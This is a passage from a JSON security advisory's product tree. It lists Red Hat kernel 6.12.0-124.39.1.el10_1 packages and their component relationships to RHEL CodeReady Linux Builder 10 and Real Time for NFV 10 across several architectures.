"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.src as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.src",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "NFV-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 10)",
